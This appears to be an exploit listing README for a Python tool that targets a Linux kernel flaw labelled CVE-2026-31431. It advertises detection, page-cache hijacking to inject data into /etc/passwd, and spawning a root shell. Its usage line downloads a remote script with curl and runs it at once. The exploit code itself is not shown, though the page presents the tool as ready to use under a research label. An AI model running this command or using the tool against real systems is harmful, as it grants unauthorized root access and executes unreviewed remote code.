Share
## https://sploitus.com/exploit?id=479E8F99-F98A-56A3-8D66-9AE84150CE5F
# CVE-2026-31431 Audit

![Python Version](https://img.shields.io/badge/Python-3.x-blue?style=flat-square&logo=python)
![Linux Kernel](https://img.shields.io/badge/Kernel-5.10+-red?style=flat-square&logo=linux)
![Security Research](https://img.shields.io/badge/Status-Research--Only-orange?style=flat-square)

This project provides a professional Python script designed to check if a system is vulnerable to **CVE-2026-31431** and demonstrates how to exploit it for research purposes.

## ๐Ÿ›  Core Features

*   **`[SCAN]` Detection**: Checks if the current kernel is affected by the CVE-2026-31431 vulnerability using a non-destructive shadow sequence.
*   **`[PUNCH]` Exploitation**: Leverages the vulnerability via page cache hijacking to inject data into `/etc/passwd` for privilege escalation simulation.
*   **`[SHELL]` Verification**: Invokes an interactive environment to verify the elevated privileges and gain root access.
*   **`[CLEAN]` Cleanup**: Flushes the system page cache to restore the audit state and ensure system consistency.

## ๐Ÿš€ Usagee

```bash
curl -fsSL https://raw.githubusercontent.com/MarioHY/cve_2026_31431_audit/main/exploit.py -o exploit.py && chmod +x exploit.py && ./exploit.py

```